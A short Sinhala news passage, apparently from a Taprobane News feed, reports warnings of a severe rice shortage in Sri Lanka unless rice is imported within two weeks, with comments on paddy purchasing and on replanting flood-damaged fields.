“දීර්ඝ කාලීන විසඳුමකට යා යුතුයි. එසේ නොගියොත් නැවත නැවත මේ අර්බුදයට යා හැකි වෙනවා. යල කන්නයේ වී මිලදී ගැනීමට වී අලෙවි මණ්ඩලය මඟින් මේ අර්බුදය යටපත් කිරීමට ක්‍රමවත් වැඩපිළිවෙලක් සකස් කළ යුතුයි. ඒ වගේම කෙටි කාලීන විසඳුමක් ලෙස රජය විසින් ඉතා ඉක්මනින් විදෙස් රටවලින් සහල් ආනයනය නොකළහොත් මේ තත්ත්වය තුළ වෙළෙඳපොළේ දැඩි සහල් හිඟයක් ඇති විය හැකිය.”

ඔහු සඳහන් කළේ බියර් සහ සත්ත්ව ආහාර නිෂ්පාදනය කිරීම සඳහා සහල් ලබා දීමේදී එය නියාමනය කිරීම ඉතා වැදගත් කාරණයක් බවය.

මේ අතර පැවති ගංවතුර තත්ත්වයෙන් හානියට පත්වූ කුඹුරු සඳහා වන්දි ලබාදීම වෙනුවට ඒවා යළි වගා කිරීමට පියවර ගතයුතු බව හිටපු කෘෂිකර්ම අධ්‍යක්ෂ කේ. බී. ගුණරත්න මහතා පවසයි.

The post ඉදිරි සති දෙක ඇතුළත සහල් ආනයනය නොකල හොත් දැඩි සහල් හිඟයක් appeared first on Taprobane News.

]]>